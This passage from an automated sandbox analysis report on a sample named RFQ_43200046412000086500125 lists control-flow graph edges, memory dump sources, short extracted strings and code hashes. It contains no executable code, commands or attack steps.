                                                                                                                          • Instruction ID: 356ebd22d437c0d3087c206b2cd4842e2b293812665df37d6d687acb7b43684c
                                                                                                                          • Opcode Fuzzy Hash: f8dfa464195414d9eb01cc5feb870ba547f60591774a774127a5efe21f2342cb
                                                                                                                          • Instruction Fuzzy Hash: 71C1D1313082949FDB259F79D8506AE7BE6EFC5310B1485AAE845CB3A2CF35DC06C7A1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 472 7ca0cf8-7ca0d1e 473 7ca0ebf-7ca0ed6 472->473 474 7ca0d24-7ca0d29 472->474 475 7ca0d2b-7ca0d31 474->475 476 7ca0d41-7ca0d45 474->476 478 7ca0d33 475->478 479 7ca0d35-7ca0d3f 475->479 480 7ca0e6b-7ca0e75 476->480 481 7ca0d4b-7ca0d4d 476->481 478->476 479->476 482 7ca0e83-7ca0e89 480->482 483 7ca0e77-7ca0e80 480->483 484 7ca0d4f-7ca0d5b 481->484 485 7ca0d5d 481->485 488 7ca0e8b-7ca0e8d 482->488 489 7ca0e8f-7ca0e9b 482->489 486 7ca0d5f-7ca0d61 484->486 485->486 486->480 490 7ca0d67-7ca0d86 486->490 491 7ca0e9d-7ca0ebc 488->491 489->491 497 7ca0d88-7ca0d94 490->497 498 7ca0d96 490->498 499 7ca0d98-7ca0d9a 497->499 498->499 499->480 500 7ca0da0-7ca0da2 499->500 500->480 501 7ca0da8-7ca0dac 500->501 501->480 502 7ca0db2-7ca0dd1 501->502 505 7ca0de9-7ca0df0 502->505 506 7ca0dd3-7ca0dd9 502->506 509 7ca0df7-7ca0df9 505->509 507 7ca0ddb 506->507 508 7ca0ddd-7ca0ddf 506->508 507->505 508->505 510 7ca0dfb-7ca0e01 509->510 511 7ca0e11-7ca0e68 509->511 512 7ca0e03 510->512 513 7ca0e05-7ca0e07 510->513 512->511 513->511
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                          • API String ID: 0-3272787073
                                                                                                                          • Opcode ID: e4b052e2641a0d728f34efd3d1d10bf7af6b64e10c4a0571ded6f4bd4efc12ed
                                                                                                                          • Instruction ID: a966bec491ae1993f395438331243a89681cb1ec3d2094b6944a1e87ab50d09c
                                                                                                                          • Opcode Fuzzy Hash: e4b052e2641a0d728f34efd3d1d10bf7af6b64e10c4a0571ded6f4bd4efc12ed
                                                                                                                          • Instruction Fuzzy Hash: CF416CB2B0020BEFCB244A2598447BA7BE5AF9128AF10846AD845CB251FB31DAC5D761

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 515 9a26d89 516 9a26d8a-9a26d92 515->516 517 9a26df0-9a26df8 516->517 518 9a26d94-9a26dab 516->518 519 9a26f08-9a26f0c 517->519 520 9a26db5-9a26dbb 518->520 521 9a26dad-9a26db3 518->521 522 9a26f12-9a26f2b 519->522 523 9a26e4d-9a26edf 519->523 524 9a26dc4-9a26dc5 520->524 525 9a26dbd 520->525 521->520 522->520 527 9a26f31-9a26f39 522->527 523->520 588 9a26ee5-9a26eed 523->588 526 9a26de4-9a26f06 524->526 525->517 525->523 525->524 525->526 528 9a26dc7-9a26dce 525->528 529 9a26dea-9a26deb 525->529 530 9a26aa9-9a26ac4 525->530 531 9a26c4f-9a26c53 525->531 532 9a26ef2-9a26ef8 525->532 533 9a26ad0-9a26adc 525->533 534 9a26efa-9a26efb 525->534 535 9a26f7e-9a26fc5 525->535 536 9a26dde-9a26f46 525->536 537 9a26cff-9a26d5a 525->537 538 9a26dfd-9a26e1d 525->538 526->519 527->520 528->532 544 9a26dd4-9a26ddc 528->544 529->535 539 9a26a91-9a26a97 530->539 540 9a26ac6-9a26ace 530->540 548 9a26c55-9a26c5d 531->548 549 9a26cc8-9a26cd4 531->549 541 9a26f48-9a26f4c 532->541 542 9a26ae3-9a26b0c 533->542 543 9a26ade 533->543 534->535 575 9a26fd2-9a26fda 535->575 576 9a26fc7-9a26fd0 535->576 536->541 537->539 582 9a26d60-9a26d68 537->582 590 9a26e23 call 9a273f0 538->590 591 9a26e23 call 9a27400 538->591 552 9a26aa0-9a26aa1 539->552 553 9a26a99 539->553 540->539 541->538 555 9a26f52-9a26f6b 541->555 542->539 554 9a26b0e-9a26b16 542->554 543->542 544->520 548->539 557 9a26ca6-9a26cae 549->557 558 9a26cd6-9a26cec 549->558 552->533 553->516 553->533 553->537 553->552 560 9a26b63-9a26b6f 553->560 561 9a26bd0-9a26be3 553->561 562 9a26b91-9a26b92 553->562 563 9a26c27-9a26c36 553->563 564 9a26cb5-9a26cb6 553->564 565 9a26c3b-9a26c4a 553->565 566 9a26c08-9a26c11 553->566 567 9a26b4c-9a26b5b 553->567 554->539 555->520 568 9a26f71-9a26f79 555->568 558->539 570 9a26cf2-9a26cfa 558->570 560->539 561->539 572 9a26d70-9a26d7c 562->572 563->539 573 9a26c13 566->573 574 9a26c1a-9a26c21 566->574 567->539 568->520 570->539 572->539 573->574 574->563 580 9a26fdf-9a2702f 575->580 581 9a26fdc-9a26fdd 575->581 576->575 577 9a26e29-9a26e48 577->520 580->517 580->523 580->526 580->528 580->529 580->532 580->534 580->535 580->536 580->538 589 9a26d81-9a26d82 580->589 581->580 582->539 588->520 589->516 589->572 590->577 591->577
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $#$$$(
                                                                                                                          • API String ID: 0-2630118175
                                                                                                                          • Opcode ID: a62857ed71384e730dad4ab53660cd5e35aa09d6b874ff0af2e10bb1f4ed6c42
                                                                                                                          • Instruction ID: 85ec57ee0fdd5e8ce2e1f3e00d6fe571db656545ab9937f4eb721c1d90fd87d9
                                                                                                                          • Opcode Fuzzy Hash: a62857ed71384e730dad4ab53660cd5e35aa09d6b874ff0af2e10bb1f4ed6c42
                                                                                                                          • Instruction Fuzzy Hash: 3AC15A74A46328CFEB20CF68D985BEDBBF2FB49704F2091AAD509A7291C7745985CF01

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 904 9933b10-9933b38 906 9933b86-9933b94 904->906 907 9933b3a-9933b81 904->907 908 9933ba3 906->908 909 9933b96-9933ba1 call 9931650 906->909 954 9933fef-9933ff6 907->954 911 9933ba5-9933bac 908->911 909->911 914 9933bb2-9933bb6 911->914 915 9933c95-9933c99 911->915 918 9933ff7-9934021 914->918 919 9933bbc-9933bc0 914->919 916 9933c9b-9933caa 915->916 917 9933cef-9933cf9 915->917 932 9933cae-9933cb3 916->932 921 9933d32-9933d58 917->921 922 9933cfb-9933d0a 917->922 929 9934029-9934053 918->929 923 9933bd2-9933c30 call 9931380 call 9931df8 919->923 924 9933bc2-9933bcc 919->924 950 9933d65 921->950 951 9933d5a-9933d63 921->951 935 9933d10-9933d2d 922->935 936 993405b-9934071 922->936 963 9933c36-9933c90 923->963 964 99340c4-99340ed 923->964 924->923 924->929 929->936 938 9933cb5-9933cea call 9933a20 932->938 939 9933cac 932->939 935->954 962 9934079-99340bc 936->962 938->954 939->932 952 9933d67-9933d92 950->952 951->952 968 9933e72-9933e76 952->968 969 9933d98-9933db1 952->969 962->964 963->954 974 99340f7-99340fd 964->974 975 99340ef-99340f5 964->975 972 9933ef0-9933efa 968->972 973 9933e78-9933e91 968->973 969->968 993 9933db7-9933dbc 969->993 978 9933f57-9933f60 972->978 979 9933efc-9933f06 972->979 973->972 1000 9933e93-9933ea2 973->1000 975->974 981 99340fe-993413b 975->981 983 9933f62-9933f90 call 9930ba0 call 9930bc0 978->983 984 9933f98-9933fe5 978->984 994 9933f08-9933f0a 979->994 995 9933f0c-9933f1e 979->995 983->984 1005 9933fed 984->1005 1006 9933dc6-9933dd5 993->1006 1001 9933f20-9933f22 994->1001 995->1001 1016 9933ea4-9933eaa 1000->1016 1017 9933eba-9933ec5 1000->1017 1003 9933f50-9933f55 1001->1003 1004 9933f24-9933f28 1001->1004 1003->978 1003->979 1010 9933f46-9933f49 1004->1010 1011 9933f2a-9933f43 1004->1011 1005->954 1024 9933dd7-9933ddd 1006->1024 1025 9933ded-9933e02 1006->1025 1010->1003 1011->1010 1022 9933eae-9933eb0 1016->1022 1023 9933eac 1016->1023 1017->964 1019 9933ecb-9933eee 1017->1019 1019->972 1019->1000 1022->1017 1023->1017 1026 9933de1-9933de3 1024->1026 1027 9933ddf 1024->1027 1028 9933e36-9933e3f 1025->1028 1029 9933e04-9933e30 1025->1029 1026->1025 1027->1025 1028->964 1032 9933e45-9933e6c 1028->1032 1029->962 1029->1028 1032->968 1032->1006
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Hbq$Hbq$Hbq
                                                                                                                          • API String ID: 0-2297679979
                                                                                                                          • Opcode ID: 267cdfd598fddf550e1ea8b6d971f576c8f0b762932be48ac29b1c908f881156
                                                                                                                          • Instruction ID: f94a0a3ad3954275515461d604b3f88d06e6067f635c00f41da0a760f3991488
                                                                                                                          • Opcode Fuzzy Hash: 267cdfd598fddf550e1ea8b6d971f576c8f0b762932be48ac29b1c908f881156
                                                                                                                          • Instruction Fuzzy Hash: 45124930A00244DFDB24DFA9C885A6EBBF6FF88304F54852DE5469B3A5DB31AC46CB51

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1041 9935840-993586b 1157 993586d call 9935d60 1041->1157 1158 993586d call 9935d49 1041->1158 1042 9935873-993587d 1043 993589f-99358b5 call 9935648 1042->1043 1044 993587f-9935882 1042->1044 1050 9935c2b-9935c3f 1043->1050 1051 99358bb-99358c7 1043->1051 1159 9935884 call 99361b0 1044->1159 1160 9935884 call 99361a0 1044->1160 1161 9935884 call 9936158 1044->1161 1162 9935884 call 9936148 1044->1162 1046 993588a-993588c 1046->1043 1048 993588e-9935896 1046->1048 1048->1043 1058 9935c7f-9935c88 1050->1058 1052 99359f8-99359ff 1051->1052 1053 99358cd-99358d0 1051->1053 1054 9935a05-9935a0e 1052->1054 1055 9935b2e-9935b68 call 9935050 1052->1055 1056 99358d3-99358dc 1053->1056 1054->1055 1059 9935a14-9935b20 call 9935050 call 99355e0 call 9935050 1054->1059 1155 9935b6b call 9937ff0 1055->1155 1156 9935b6b call 9937fe8 1055->1156 1060 99358e2-99358f6 1056->1060 1061 9935d20 1056->1061 1063 9935c8a-9935c91 1058->1063 1064 9935c4d-9935c56 1058->1064 1152 9935b22 1059->1152 1153 9935b2b-9935b2c 1059->1153 1075 99359e8-99359f2 1060->1075 1076 99358fc-9935991 call 9935648 * 2 call 9935050 call 99355e0 call 9935688 call 9935730 call 9935798 1060->1076 1071 9935d25-9935d29 1061->1071 1068 9935c93-9935cd6 call 9935050 1063->1068 1069 9935cdf-9935ce6 1063->1069 1064->1061 1066 9935c5c-9935c6e 1064->1066 1087 9935c70-9935c75 1066->1087 1088 9935c7e 1066->1088 1068->1069 1072 9935d0b-9935d1e 1069->1072 1073 9935ce8-9935cf8 1069->1073 1077 9935d34 1071->1077 1078 9935d2b 1071->1078 1072->1071 1073->1072 1092 9935cfa-9935d02 1073->1092 1075->1052 1075->1056 1131 9935993-99359ab call 9935730 call 9935050 call 9935300 1076->1131 1132 99359b0-99359e3 call 9935798 1076->1132 1086 9935d35 1077->1086 1078->1077 1086->1086 1163 9935c78 call 9938781 1087->1163 1164 9935c78 call 9938790 1087->1164 1088->1058 1092->1072 1100 9935b71-9935c22 call 9935050 1100->1050 1131->1132 1132->1075 1152->1153 1153->1055 1155->1100 1156->1100 1157->1042 1158->1042 1159->1046 1160->1046 1161->1046 1162->1046 1163->1088 1164->1088
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$4'^q$4'^q
                                                                                                                          • API String ID: 0-1196845430
                                                                                                                          • Opcode ID: 53d60edcb34d6119ef12850c1a96da78ee95ce36e834dfeaca23bd2073202fdb
                                                                                                                          • Instruction ID: f5d54a0be5750920e5126cebebab6c1ca580cf1bf9f113a17da5bf5c72cd2ba2
                                                                                                                          • Opcode Fuzzy Hash: 53d60edcb34d6119ef12850c1a96da78ee95ce36e834dfeaca23bd2073202fdb
                                                                                                                          • Instruction Fuzzy Hash: BFF1ED34A10118DFCB04DFA4D998A9DB7B2FF89304F558159E90AAB3A5DB71EC42CF81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1165 993a220-993a230 1166 993a236-993a23a 1165->1166 1167 993a349-993a36d 1165->1167 1168 993a240-993a249 1166->1168 1169 993a374-993a398 1166->1169 1167->1169 1171 993a39f-993a3d5 1168->1171 1172 993a24f-993a276 1168->1172 1169->1171 1189 993a3dc-993a434 1171->1189 1182 993a33e-993a348 1172->1182 1183 993a27c-993a27e 1172->1183 1185 993a280-993a283 1183->1185 1186 993a29f-993a2a1 1183->1186 1188 993a289-993a293 1185->1188 1185->1189 1187 993a2a4-993a2a8 1186->1187 1191 993a2aa-993a2b9 1187->1191 1192 993a309-993a315 1187->1192 1188->1189 1190 993a299-993a29d 1188->1190 1203 993a436-993a43b 1189->1203 1204 993a458-993a46f 1189->1204 1190->1186 1190->1187 1191->1189 1198 993a2bf-993a306 1191->1198 1192->1189 1194 993a31b-993a338 1192->1194 1194->1182 1194->1183 1198->1192 1282 993a43e call 993a700 1203->1282 1283 993a43e call 993a6f0 1203->1283 1212 993a560-993a570 1204->1212 1213 993a475-993a55b call 9935648 call 9935050 * 2 call 9935688 call 9938e58 call 9935050 call 9937ff0 call 9935ef0 1204->1213 1206 993a444-993a44a 1279 993a44d call 993a7b0 1206->1279 1280 993a44d call 993a7a0 1206->1280 1281 993a44d call 993a938 1206->1281 1209 993a453 1211 993a683-993a68e 1209->1211 1220 993a690-993a6a0 1211->1220 1221 993a6bd-993a6de call 9935798 1211->1221 1223 993a576-993a650 call 9935648 * 2 call 9935e00 call 9935050 * 2 call 9935300 call 9935798 call 9935050 1212->1223 1224 993a65e-993a67a call 9935050 1212->1224 1213->1212 1234 993a6a2-993a6a8 1220->1234 1235 993a6b0-993a6b8 call 9935ef0 1220->1235 1276 993a652 1223->1276 1277 993a65b 1223->1277 1224->1211 1234->1235 1235->1221 1276->1277 1277->1224 1279->1209 1280->1209 1281->1209 1282->1206 1283->1206
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq$(bq$Hbq
                                                                                                                          • API String ID: 0-2835675688
                                                                                                                          • Opcode ID: 8bf14079331fef3b28dba78ec555a6672b572286509f4f6bc1a4d18de3020bb9
                                                                                                                          • Instruction ID: 94f502e8578ae0b325652317c8a1b7a3453c7c09668302aee5d80aff06242fa1
                                                                                                                          • Opcode Fuzzy Hash: 8bf14079331fef3b28dba78ec555a6672b572286509f4f6bc1a4d18de3020bb9
                                                                                                                          • Instruction Fuzzy Hash: B3E13034A01209DFCB04EF64D594AAEBBB6FF89300F51C569E845AB364DB31EC85CB91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1284 9a2702e-9a2702f 1285 9a26ef2-9a26ef8 1284->1285 1286 9a26df0-9a26df8 1284->1286 1287 9a26d81-9a26d82 1284->1287 1288 9a26dc7-9a26dce 1284->1288 1289 9a26de4-9a26f06 1284->1289 1290 9a26efa-9a26efb 1284->1290 1291 9a26dea-9a26deb 1284->1291 1292 9a26dde-9a26f46 1284->1292 1293 9a26f7e-9a26fc5 1284->1293 1294 9a26dfd-9a26e02 1284->1294 1295 9a26e4d-9a26edf 1284->1295 1303 9a26f48-9a26f4c 1285->1303 1300 9a26f08-9a26f0c 1286->1300 1301 9a26d70-9a26d7c 1287->1301 1302 9a26d8a-9a26d92 1287->1302 1288->1285 1296 9a26dd4-9a26ddc 1288->1296 1289->1300 1290->1293 1291->1293 1292->1303 1330 9a26fd2-9a26fda 1293->1330 1331 9a26fc7-9a26fd0 1293->1331 1307 9a26e0c-9a26e1d 1294->1307 1305 9a26db5-9a26dbb 1295->1305 1357 9a26ee5-9a26eed 1295->1357 1296->1305 1300->1295 1309 9a26f12-9a26f2b 1300->1309 1306 9a26a91-9a26a97 1301->1306 1302->1286 1308 9a26d94-9a26dab 1302->1308 1303->1294 1304 9a26f52-9a26f6b 1303->1304 1304->1305 1311 9a26f71-9a26f79 1304->1311 1316 9a26dc4-9a26dc5 1305->1316 1317 9a26dbd 1305->1317 1312 9a26aa0-9a26aa1 1306->1312 1313 9a26a99 1306->1313 1358 9a26e23 call 9a273f0 1307->1358 1359 9a26e23 call 9a27400 1307->1359 1308->1305 1315 9a26dad-9a26db3 1308->1315 1309->1305 1318 9a26f31-9a26f39 1309->1318 1311->1305 1321 9a26ad0-9a26adc 1312->1321 1313->1302 1313->1312 1320 9a26b63-9a26b6f 1313->1320 1313->1321 1322 9a26bd0-9a26be3 1313->1322 1323 9a26b91-9a26b92 1313->1323 1324 9a26c27-9a26c36 1313->1324 1325 9a26cb5-9a26cb6 1313->1325 1326 9a26c3b-9a26c4a 1313->1326 1327 9a26c08-9a26c11 1313->1327 1328 9a26cff-9a26d5a 1313->1328 1329 9a26b4c-9a26b5b 1313->1329 1315->1305 1316->1289 1317->1285 1317->1286 1317->1288 1317->1289 1317->1290 1317->1291 1317->1292 1317->1293 1317->1294 1317->1295 1317->1316 1317->1321 1317->1328 1333 9a26aa9-9a26ac4 1317->1333 1334 9a26c4f-9a26c53 1317->1334 1318->1305 1320->1306 1336 9a26ae3-9a26b0c 1321->1336 1337 9a26ade 1321->1337 1322->1306 1323->1301 1324->1306 1338 9a26c13 1327->1338 1339 9a26c1a-9a26c21 1327->1339 1328->1306 1355 9a26d60-9a26d68 1328->1355 1329->1306 1340 9a26fdf-9a26fe0 1330->1340 1341 9a26fdc-9a26fdd 1330->1341 1331->1330 1332 9a26e29-9a26e48 1332->1305 1333->1306 1335 9a26ac6-9a26ace 1333->1335 1342 9a26c55-9a26c5d 1334->1342 1343 9a26cc8-9a26cd4 1334->1343 1335->1306 1336->1306 1347 9a26b0e-9a26b16 1336->1347 1337->1336 1338->1339 1339->1324 1340->1284 1341->1340 1342->1306 1348 9a26ca6-9a26cae 1343->1348 1349 9a26cd6-9a26cec 1343->1349 1347->1306 1349->1306 1351 9a26cf2-9a26cfa 1349->1351 1351->1306 1355->1306 1357->1305 1358->1332 1359->1332
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $$$(
                                                                                                                          • API String ID: 0-3551151888
                                                                                                                          • Opcode ID: 9829dfb049803d1e43f74dd54742d4f6da89797677d4fda6eb68355c8e60d74e
                                                                                                                          • Instruction ID: 44839855f3e06e3d017b1cca7bc8c0c20e0300681d90ff19d5d1a8f5128f0f7e
                                                                                                                          • Opcode Fuzzy Hash: 9829dfb049803d1e43f74dd54742d4f6da89797677d4fda6eb68355c8e60d74e
                                                                                                                          • Instruction Fuzzy Hash: 3DB15A70946328CFEB20CF68D985BEDBBF2FB49704F2091AAD509A7295CB745985CF01

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1360 7ca0cd7-7ca0d1e 1362 7ca0ebf-7ca0ed6 1360->1362 1363 7ca0d24-7ca0d29 1360->1363 1364 7ca0d2b-7ca0d31 1363->1364 1365 7ca0d41-7ca0d45 1363->1365 1367 7ca0d33 1364->1367 1368 7ca0d35-7ca0d3f 1364->1368 1369 7ca0e6b-7ca0e75 1365->1369 1370 7ca0d4b-7ca0d4d 1365->1370 1367->1365 1368->1365 1371 7ca0e83-7ca0e89 1369->1371 1372 7ca0e77-7ca0e80 1369->1372 1373 7ca0d4f-7ca0d5b 1370->1373 1374 7ca0d5d 1370->1374 1377 7ca0e8b-7ca0e8d 1371->1377 1378 7ca0e8f-7ca0e9b 1371->1378 1375 7ca0d5f-7ca0d61 1373->1375 1374->1375 1375->1369 1379 7ca0d67-7ca0d86 1375->1379 1380 7ca0e9d-7ca0ebc 1377->1380 1378->1380 1386 7ca0d88-7ca0d94 1379->1386 1387 7ca0d96 1379->1387 1388 7ca0d98-7ca0d9a 1386->1388 1387->1388 1388->1369 1389 7ca0da0-7ca0da2 1388->1389 1389->1369 1390 7ca0da8-7ca0dac 1389->1390 1390->1369 1391 7ca0db2-7ca0dd1 1390->1391 1394 7ca0de9-7ca0df0 1391->1394 1395 7ca0dd3-7ca0dd9 1391->1395 1398 7ca0df7-7ca0df9 1394->1398 1396 7ca0ddb 1395->1396 1397 7ca0ddd-7ca0ddf 1395->1397 1396->1394 1397->1394 1399 7ca0dfb-7ca0e01 1398->1399 1400 7ca0e11-7ca0e68 1398->1400 1401 7ca0e03 1399->1401 1402 7ca0e05-7ca0e07 1399->1402 1401->1400 1402->1400
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$$^q$$^q
                                                                                                                          • API String ID: 0-2291298209
                                                                                                                          • Opcode ID: 359920217408c189b6de995f48c6056dcae03ddc0f3082669f03dff3db41e893
                                                                                                                          • Instruction ID: 8163e6cae3600e7228a68e2af57e1c4d0acd7d33b53382adc7a17959896097ec
                                                                                                                          • Opcode Fuzzy Hash: 359920217408c189b6de995f48c6056dcae03ddc0f3082669f03dff3db41e893
                                                                                                                          • Instruction Fuzzy Hash: E5313CF2A0430BBFDB314F1589807BA7BB59F522DAF04006AC8448B192F735DAC5D7A1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1404 7ca05c8-7ca05ee 1405 7ca073b-7ca076d 1404->1405 1406 7ca05f4-7ca05f9 1404->1406 1416 7ca07ce-7ca07d8 1405->1416 1417 7ca076f-7ca078c 1405->1417 1407 7ca05fb-7ca0601 1406->1407 1408 7ca0611-7ca0615 1406->1408 1409 7ca0603 1407->1409 1410 7ca0605-7ca060f 1407->1410 1411 7ca061b-7ca061d 1408->1411 1412 7ca06e7-7ca06f1 1408->1412 1409->1408 1410->1408 1414 7ca061f-7ca062b 1411->1414 1415 7ca062d 1411->1415 1418 7ca06ff-7ca0705 1412->1418 1419 7ca06f3-7ca06fc 1412->1419 1423 7ca062f-7ca0631 1414->1423 1415->1423 1420 7ca07da-7ca07de 1416->1420 1421 7ca07e1-7ca07e7 1416->1421 1431 7ca081d-7ca0822 1417->1431 1432 7ca0792-7ca0798 1417->1432 1424 7ca070b-7ca0717 1418->1424 1425 7ca0707-7ca0709 1418->1425 1426 7ca07e9-7ca07eb 1421->1426 1427 7ca07ed-7ca07f9 1421->1427 1423->1412 1428 7ca0637-7ca0639 1423->1428 1430 7ca0719-7ca0738 1424->1430 1425->1430 1434 7ca07fb-7ca081a 1426->1434 1427->1434 1428->1412 1435 7ca063f-7ca0643 1428->1435 1431->1432 1436 7ca079a 1432->1436 1437 7ca079c-7ca07a8 1432->1437 1435->1412 1440 7ca0649-7ca064b 1435->1440 1441 7ca07aa-7ca07c8 1436->1441 1437->1441 1443 7ca064d-7ca0653 1440->1443 1444 7ca0665-7ca066c 1440->1444 1441->1416 1448 7ca0657-7ca0663 1443->1448 1449 7ca0655 1443->1449 1450 7ca0673-7ca0675 1444->1450 1448->1444 1449->1444 1453 7ca068d-7ca06e4 1450->1453 1454 7ca0677-7ca067d 1450->1454 1456 7ca067f 1454->1456 1457 7ca0681-7ca0683 1454->1457 1456->1453 1457->1453
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$$^q$$^q
                                                                                                                          • API String ID: 0-2291298209
                                                                                                                          • Opcode ID: 45e4e3374722b48563987ab7feac15443060fcd6400b28b5b3e12d13af8e6a29
                                                                                                                          • Instruction ID: c180e2ebfc2929b4cec427ac56bcff4d5b211fa2b47b9f6ab9fa57db818a3762
                                                                                                                          • Opcode Fuzzy Hash: 45e4e3374722b48563987ab7feac15443060fcd6400b28b5b3e12d13af8e6a29
                                                                                                                          • Instruction Fuzzy Hash: C31160F1F0030BEBDB248E15C584BAAB7B4ABC469EF15802ADC048A101F732C6D5CB61
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$4'^q
                                                                                                                          • API String ID: 0-2697143702
                                                                                                                          • Opcode ID: 7d0b99eb8ce6366f79bab7a3261371c5614e0211a6cde358f7d124d8c91c04ea
                                                                                                                          • Instruction ID: ddb9e9f5be6f5814e470acaac52b3e179e94d6143615d61c4045b4cde621cbfc
                                                                                                                          • Opcode Fuzzy Hash: 7d0b99eb8ce6366f79bab7a3261371c5614e0211a6cde358f7d124d8c91c04ea
                                                                                                                          • Instruction Fuzzy Hash: C5F1D6B4D0124AEFCB54DFA5E8986ACBBB2FF8931AF148429E506A7350DB355D85CF00
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq$d
                                                                                                                          • API String ID: 0-3334038649
                                                                                                                          • Opcode ID: 5d69266d6aa110b170491a5f1a4c2405c4081c8267f8fbb246111364a7a3e688
                                                                                                                          • Instruction ID: 53ce2912999def5e373ea74cff83bdbddb2af2fa19f18308d8a7bfa9bbc0d496
                                                                                                                          • Opcode Fuzzy Hash: 5d69266d6aa110b170491a5f1a4c2405c4081c8267f8fbb246111364a7a3e688
                                                                                                                          • Instruction Fuzzy Hash: 84D17C34600606CFCB14CF29C48596ABBF6FF88315B95CA69E45A8B761DB30FC45CB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (_^q$Pl^q
                                                                                                                          • API String ID: 0-1560878243
                                                                                                                          • Opcode ID: 94d78c6575a753f12d0e7359f05abd1c41e7c3a0f96287fb26f7257541110474
                                                                                                                          • Instruction ID: 3f64895c6ae277fc6fa81314dd6b2b05e8ef2bec48949d7d1785f87ea96a25ae
